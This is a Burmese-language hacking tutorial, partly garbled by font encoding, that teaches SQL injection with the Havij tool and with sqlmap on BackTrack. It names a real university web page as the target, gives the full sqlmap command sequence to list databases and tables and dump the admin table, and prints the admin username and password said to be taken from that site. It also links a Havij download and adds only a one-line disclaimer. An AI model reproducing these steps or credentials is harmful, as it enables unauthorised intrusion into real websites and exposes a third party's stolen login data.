SQL Injection Attack ကို Software သဵု့၍်ပဳလုပး်ခငး့ SQL Injection ကိုေဆာံွဲ သဵု့၍်ပဳလုပးလ္ြငးရပါေသ့သညး။ေဆာံွဲကေတာံသူနဲံတိုးကးဆိုငးတဲံအေ်ခအေနတစး ခုမြာေရ့ထာ့တာေႀကာငးံဆိုကးတိုငး့ေတာံစမး့သပးလိုံရမညးမဟုတးပါ။က္ေနားတိုံ Havij ဟူေသာ Tool ကိုစမး့ သပး်ပီ့ SQL attack လုပးႀကညးံပါမယး။Havij သဵု့်ပီ့ ေအာငး်မငးေနသူမ္ာ့စျာရြိပါတယး။SQL Injection အ တျကးလိုအပးတဲ ံ Tools ေတျ ကိုက္ေနားေအာကးမြာ Download ေပ့ပါံမယး။ ပထမဆဵု့ Havij ကို Download ဆျဲပါ။်ပီေတာံ SQL Vuln ရြိေနတဲွ ံ ကးဘးဆိုကးတစးခုကို Havij ရဲံ Target ထဲမြာထညးံပါ။ပဵုနမူနာ်ပထာ့ပါတယး
ႊTarget ေနရာမြာ မိမိ လုပးခ္ငးတဲံ SQL vunl ်ဖစးတဲံဆိုကးကိုထညးံပါ။်ပီ့ေတံာ Analyze ကိုနြိပးပါ။
ေအာကးပါပဵုမြာ Scann ဖတးေန်ပီ့ေနာကးဆဵု့ Current Database ေပၚ်ပီ့ Table ေလ့ေပၚလာပါမယး။
အထကးပါပဵုမြာ Table ေလ့ေပၚလာရငးနြိပးပါ ။Main Table တစးခုေတျံမြာပါ။အခုဒီဆိုကးမြာေတာံ Main Table က flashin_sparkms ပါ Get Table ခလုပးကိုထပးနြိပးပါ။Get tableကိုနြိပးလိုကးတဲံအခါမြာ User Table , Admin Table စသ်ဖငးံ Table မ္ာ့ေတျ ံႀကရမြာပါ။မိမိလိုခ္ငးတဲံ Admin Table ်ဖစး်ဖစး User Table ကို်ဖစး်ဖစးအမြတး်ခစးလိုကးပါ။်ပီ့ေတာံ GET Column ကိုနြိပးပါ။ေအာကးမြာပဵု်ပထာ့ပါတယး။
GET Columns ကိုနြိပးအ်ပီ့မြာ Password Column ေတျ Id column ေတျေတျ ံရမြာပါ။အဲဒါေတျထဲမြာပကးဆ ွကးေတျရြိေနနိုငးတာမို ံအမြနး်ခစး်ပီ့ Get data ကိုနြိပးလိုကးပါ
အဲဒီအခါမြာ Admin ,user ,Id ေတျရဲ ံ Username .Password ေတျကိုရရြိပါ်ပီ။မိမ၇ ိ ရြိလာတဲံပကးဆွကးမ္ာ့ ကို ်ပနးွငးဖို ံ မိမိတာ့ဂတးဆိုကးရဲ ံ Login page မေတျ ံပါက Havij မြာ Find Admin ဆိုတာပါပါတယး။
ရြာႀကညံး်ပီ့၊ Login page ကိွ ု ငးေရာကးနိုငးပါ်ပီ။
Havij နဲံ Pen test လုပး်ခငး့ဒီမြာ်ပီ့ပါ်ပီ။စိတးရြညးလကးရြညးနဲံစမး့သပးဖိုံကေတာံမိမိတာွနးပါ။
Back Track ၏ SQL Map ကိုအသဵု့်ပဳ၍ SQL Inject ်ပဳလုပး်ခငး့ က္ေနားတိုံအခု Back Track ကးိုသဵု့်ပီ့ SQL Injection တစးခုလုပးႀကညံးႀကမယး။
1.ပထမဆဵု့ေအာကးပါ SQL Vuln ရြိေနတဲံဆိုကးတစးခုကိုေရျ့လိုကးတယး။ http://www.hu.edu.pk/viewfaculty.php?id=12 2.်ပီ့ေတာံ BT ရဲံ Terminal မြာ cd /pentest/database/sqlmap လိုံရိုကးပါမယး
3.ေအာကးက ကျနးမနး့ရိုကးပါ။မိမိတာ့ဂတးထညးံပါ ./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 -u is the vulnerable url အတျကးရညးညႊနး့ပါတယး။ေအာကးပါ Command မ္ာ့ကိုလဲဆကးရိုကးသျာ့ပါ
./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 --dbs or ./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 --current-db
က္ေနားတိုံက --dbs ကိုသဵု့တဲံသေဘာက ဆကးနျယးတဲံေဒတာေဘံကို်ပခ္ငးတဲံသေဘာပါ --current-db ကိုသဵု့မယးဆိုရငးေတာံ သကးဆိုငးတဲံအဓိကတစးခုကိုသာ်ပမြာပါ
က္ေနားတိုံအခု Current databaseဆို်ပီ့ Data Base Name တစးခုရပါ်ပီ။ဒီမြာေတာံ c3recults ပါ။မိမိတာ့ဂတးအလိုကးနာမညးေ်ပာငး့နိုငးပါတယး။Command မြာမိမိ Database name ကိုေ်ပာငး့သဵု့ပါ ေအာကးပါ Command ကိုရိုကးပါ
./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 -D c3results --tables
-- table ကိုထညးံတဲံသေဘာက ွကးဘးဆိုကးထဲက Tableေတျကိုဆျဲေခၚလိုကးတာပါ။
Admin Cloumnကိုရဖိုံေအာကးပါ Command ကိုသဵု့သျာ့ပါတယး။
./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 -D c3results -T admin --columns အခုဆိုက္ေနားတုိံတာ့ဂတးရဲံ Name ေတျကုိရပါ်ပီ ….
ေအာကးပါ Command ကိုဆကးရိုကးပါ Admin ,Id ,Password ေတျကိုေခၚတာ်ဖစးပါတယး
./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 -D c3results -T admin -C id,passwrd,u_name --dump
ေနာကးဆဵု့မြာက္ေနားတုိံ Admin user+password ကိုရရြိလိုကးပါတယး။
ေအာကးမြာ်ပထာ့တာေတာံ က္ေနားတို ံ Pen Test လုပးလိုံရလာတဲံ Admin acessပါပဲ Database Name : c3results No of tables :48 Admin Table Name : admin admin username : 123_admin_123 admin password : 123_hazara_123 ………………………………………………………………………………………………..
Countermeasures From SQL Attack (SQL Attackရနးမြကာကျယးနညး့မ္ာ့) CEH ထဲကပဵုမ္ာ့်ဖငးံတိုကးရိုကးေဖၚ်ပေပ့ထာ့ပါတယး။ပဵုမြ်ပထာ့တာရြငး့လိုံ Beginnerမ္ာ့အတျကးေတာံ Knowledge အ်ဖစးသိထာ့ရငးလဵုေလာကးပါတယး။
……………………………………………………………………………………………………………………………………….
REF:ကို Brb (Planet Creator),You Tube,Back Track Forum,H1n1 (mmcyberdevils),all ItemZ,CEH7,Google Special Thz to: (G Tone MHU) ၊ BHG၊Myanmar Cyber Army၊
SQL Injection နဲံပါတးသတးေသာ Video မ္ာ့ႀကညးံရနး Sql injection attack Videos http://www.youtube.com/watch?v=h-9rHTLHJTY http://www.youtube.com/watch?v=jMQ2wdOmMIA http://www.youtube.com/watch?v=PB7hWlqTSqs http://www.youtube.com/topic/QJnLFoEO7Fs/?feature=results_main http://www.youtube.com/watch?v=bORZlmyDw0s http://www.youtube.com/watch?v=JqzWPLq7bJY http://www.youtube.com/watch?v=0z1rt9Y-ON0 http://www.youtube.com/watch?v=qELByGfNJSE Havij အသဵု့်ပဳနညး့ Videos
http://www.youtube.com/watch?v=Qvhdz8yE_po http://www.youtube.com/watch?v=DMcaqCGHUVc http://www.youtube.com/watch?v=JdgE7MSsBTc http://www.youtube.com/watch?v=Ck5bifmAjZk SQL injection with Back Track Videos
http://www.youtube.com/watch?v=ViezR1Qmcns
http://www.youtube.com/watch?v=hANMjTqFLD8 http://www.youtube.com/watch?v=-F1nBasky6E http://www.youtube.com/watch?v=2cKJ5l9qYE0 http://www.youtube.com/watch?v=TqvLMWNTBYU
Havij Download ::::::: http://www.mediafire.com/download.php?r3ey1g20q1y69ka SQL Injection နညး့ဟာစိတးရြညးသီ့ခဵမြဳနဲံ်ဖတးထို့ဥာဏးေပၚမြာမူတညး်ပီ့ေအာငး်မငးတတးပါတယး။ နာ့မလညးလဲႀကိဳ့စာ့်ပီ့ဖတးႀကညးံႀကပါ။မသိတာကိုေက္ားမဖတးပါနဲံတဆငးံ်ခငး့ေအာငး်မငးေအာငးႀကိဳ့စာ့ ႀကညးံပါ။တစးဆိုကမ း ရတစးဆိုကးစမး့သပးႀကညးံပါ။မေလာပါနဲံ။မရရငးစိတးမပ္ကးပါနဲံ၊လကးမေလ္ာံပါနဲံ။ Video မ္ာ့ကို Download ဆျဲ်ပီ့ေသခ္ာေလံလာႀကပါဦ့၊က္ေနားေပ့ထာ့တဲံ Videoမ္ာ့ကိုႀကညးံပါက ဘယးသူ ံကိုမြေမ့စရာမလိုပဲဆရာတစးေယာကးကအနီ့ကပးလာ်ပီ့သငးႀကာ့ေပ့ေနသလိုခဵစာ့ရမြာပါ။ Black Attack လုပးေတာံမယးဆိုရငး Cyber Law ကိုသတိရြိႀကပါခငးဗ္ာ။Educational Purpose Only ်ဖစး လိုံ Attacking နဲံပါတးသတး်ပီ့ မိမိစမး့သပးမိမိတာွနးသာ်ဖစးပါသညး။
စာဖတးသူမ္ာ့အာ့အစဥးေလ့စာ့လ္ကး
စုေဆာငး့တငး်ပသူ -
3thic0kiddi3 (Ethic Kiddie)
www.ethickiddie.blogspot.com 3thic0kiddi3@gmail.com
ထျကးရြိ်ပီ့ေသာစာအုပးမ္ာ့ 1.Wifi hacking basic 2.DNN hacking Basic 3.IIS Hacking Basic 4.Network Hacking Basic 5.Loic Tool DDOS Basic 6.SQL Injection Basic